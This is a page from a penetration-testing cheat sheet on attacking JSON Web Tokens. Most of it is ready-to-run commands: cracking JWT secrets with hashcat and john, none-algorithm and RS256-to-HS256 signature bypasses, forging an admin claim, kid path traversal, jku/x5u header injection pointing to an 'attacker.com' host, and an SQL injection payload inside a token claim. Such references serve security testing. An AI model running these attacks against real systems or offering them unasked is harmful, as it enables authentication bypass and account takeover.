JWT - Pentest Book

Tools
1
# https://github.com/ticarpi/jwt_tool
2
# https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
3
​
4
# https://github.com/hahwul/jwt-hack
5
# https://github.com/mazen160/jwt-pwn
6
# https://github.com/mBouamama/MyJWT
7
# https://github.com/DontPanicO/jwtXploiter
8
​
9
# Test all common attacks
10
python3 jwt_tool.py -t https://url_that_needs_jwt/ -rh "Authorization: Bearer JWT" -M at -cv "Welcome user!"
11
​
12
# Hashcat
13
# dictionary attacks 
14
hashcat -a 0 -m 16500 jwt.txt passlist.txt
15
# rule-based attack  
16
hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule
17
# brute-force attack
18
hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6
19
​
20
​
21
# Crack
22
pip install PyJWT
23
# https://github.com/Sjord/jwtcrack
24
# https://raw.githubusercontent.com/Sjord/jwtcrack/master/jwt2john.py
25
jwt2john.py JWT
26
./john /tmp/token.txt --wordlist=wordlist.txt
27
​
28
# Wordlist generator crack tokens:
29
# https://github.com/dariusztytko/token-reverser
30
​
31
# RS256 to HS256
32
openssl s_client -connect www.google.com:443 | openssl x509 -pubkey -noout > public.pem
33
cat public.pem | xxd -p | tr -d "\\n" > hex.txt
34
# Sign JWT with hex.txt 
35
​
Copied!
General info
1
1. Leak Sensitive Info
2
2. Send without signature
3
3. Change algorythm r to h
4
4. Crack the secret h256
5
5. KID manipulation
6
​
7
eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjE1ODQ2NTk0MDAsInVzZXJuYW1lIjoidGVtcHVzZXI2OSIsInJvbGVzIjpbIlJPTEVfRVhURVJOQUxfVVNFUiJdLCJhcHBDb2RlIjoiQU5UQVJJX0FQSSIsImlhdCI6MTU4NDU3MzAwMH0.AOHXCcMFqYFeDSYCEjeugT26RaZLzPldqNAQSlPNpKc2JvdTG9dr2ini4Z42dd5xTBab-PYBvlXIJetWXOX80A
8
​
9
https://trustfoundry.net/jwt-hacking-101/
10
https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9
11
https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/
12
https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a
13
​
14
- JKU & X5U Headers - JWK
15
    - Header injection
16
    - Open redirect
17
​
18
​
19
​
20
- Remember test JWT after session is closed
Copied!
Attacks
Header
1
# None algorithm
2
python3 jwt_tool.py <JWT> -X a
3
​
4
# From RS256 to HS256
5
python3 jwt_tool.py <JWT> -S hs256 -k public.pem
6
​
7
# Not checked signature
8
python3 jwt_tool.py <JWT> -I -pc name -pv admin
9
​
10
# Crack secret key
11
python3 jwt_tool.py <JWT> -C -d secrets.txt 
12
​
13
# Null kid
14
python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
15
​
16
# Use source file as kid to verify signature
17
python3 jwt_tool.py -I -hc kid -hv "path/of/the/file" -S hs256 -p "Content of the file"
18
​
19
# jku manipulation for open redirect
20
python3 jwt_tool.py <JWT> -X s -ju "https://attacker.com/jwttool_custom_jwks.json"
21
​
22
# x5u manipulation for open redirect
23
openssl req -newkey rsa:2048 -nodes -keyout private.pem -x509 -days 365 -out attacker.crt -subj "/C=AU/L=Brisbane/O=CompanyName/CN=pentester"
24
python3 jwt_tool.py <JWT> -S rs256 -pr private.pem -I -hc x5u -hv "https://attacker.com/custom_x5u.json"
Copied!
Payload
1
# SQLi
2
python3 jwt_tool.py <JWT> -I -pc name -pv "imparable' ORDER BY 1--" -S hs256 -k public.pem
3
​
4
# Manipulate other values to change expiration time or userID for example
Copied!

ASP.NET

GitHub

Last modified 4mo ago

Export as PDF

Copy link

Contents